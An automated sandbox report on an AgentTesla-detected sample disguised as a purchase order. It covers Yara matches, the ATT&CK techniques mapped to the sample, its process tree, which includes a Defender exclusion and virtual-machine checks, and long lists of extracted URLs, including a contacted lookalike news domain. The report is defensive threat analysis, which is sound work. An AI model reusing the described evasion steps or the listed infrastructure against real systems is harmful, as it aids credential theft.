Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe | Code function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
Source: Yara match | File source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
Source: Yara match | File source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952, type: MEMORY
Source: Yara match | File source: Process Memory Space: SWqTT.exe PID: 3064, type: MEMORY
Source: Yara match | File source: 32.2.SWqTT.exe.64915d0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.SWqTT.exe.64915d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.08042021New-PurchaseOrder.exe.35790c8.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 2 | Logon Script (Mac) | Windows Service 1 | Timestomp 1 | NTDS | Security Software Discovery 331 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 251 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 251 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 383917
Sample: 08042021New-PurchaseOrder.bat
Startdate: 08/04/2021
Architecture: WINDOWS
Score: 96

Start (node 2)
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected AgentTesla; Initial sample is a PE file and has a suspicious name
  Started: 08042021New-PurchaseOrder.exe 21 7 (node 7); SWqTT.exe (node 12); SWqTT.exe (node 14)

08042021New-PurchaseOrder.exe (node 7)
  DNS/IP: myliverpoolnews.cf 172.67.150.212, 443, 49703, 49704 CLOUDFLARENETUS United States; 192.168.2.1 unknown unknown
  Dropped: C:\Users\user\AppData\...\AdvancedRun.exe, PE32
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Adds a directory exclusion to Windows Defender
  Started: 08042021New-PurchaseOrder.exe (node 16); cmd.exe (node 20); powershell.exe 23 (node 22); 3 other processes (node 28)

SWqTT.exe (node 12)
  Dropped: C:\Users\user\AppData\...\AdvancedRun.exe, PE32
  Signatures: Multi AV Scanner detection for dropped file; Hides threads from debuggers
  Started: AdvancedRun.exe (node 24)

SWqTT.exe (node 14)
  Dropped: C:\Users\user\AppData\...\AdvancedRun.exe, PE32
  Started: AdvancedRun.exe (node 26)

08042021New-PurchaseOrder.exe (node 16)
  Dropped: C:\Users\user\AppData\Roaming\...\SWqTT.exe, PE32; C:\Users\user\...\SWqTT.exe:Zone.Identifier, ASCII
  Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)

cmd.exe (node 20)
  Started: conhost.exe (node 30); timeout.exe (node 32)

powershell.exe (node 22)
  Started: conhost.exe (node 34)

AdvancedRun.exe (node 24)
  Started: AdvancedRun.exe (node 36)

3 other processes (node 28)
  Started: AdvancedRun.exe (node 38); conhost.exe (node 40)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
08042021New-PurchaseOrder.exe | 15% | ReversingLabs | ByteCode-MSIL.Packed.Generic

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe | 15% | ReversingLabs | ByteCode-MSIL.Packed.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe
http://www.microsoft.co | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/ | 0% | URL Reputation | safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | 0% | URL Reputation | safe
https://reachplc.hub.loginradius.com" | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816 | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
myliverpoolnews.cf | 172.67.150.212 | true | false | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html | false | Avira URL Cloud: safe | unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name / Source / Malicious / Antivirus Detection / Reputation

https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

http://www.microsoft.co
  Source: powershell.exe, 00000008.00000003.391009899.0000000008E79000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://c.amazon-adsystem.com/aax2/apstag.js
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Reputation: high

https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmp
  Malicious: false
  Antivirus detection: URL Reputation: safe
  Reputation: unknown

https://www.liverpool.com/all-about/premier-league
  Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmp
  Malicious: false
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.liverpool.com/liverpool-fc-news/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-1716615408042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-1995785008042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-0208042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.drfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.484366830.0000000005117000.00000004.00000001.sdmpfalse
                              high
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                high
                                https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-187608042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                  high
                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-199616608042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://reachplc.hub.loginradius.com&quot;08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.34.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-127371669008042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-1994581608042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-123135383708042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000003.374847695.00000000075F3000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.355318140.0000000007E70000.00000004.00000001.sdmpfalse
                                    high
                                    https://felix.data.tm-awx.com/felix.min.js08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/all-about/ozan-kabak08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://s2-prod.mirror.co.uk/08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08042021New-PurchaseOrder.exe, 00000001.00000002.289004611.0000000002471000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/all-about/champions-league08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://www.liverpool.com/all-about/curtis-jones08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
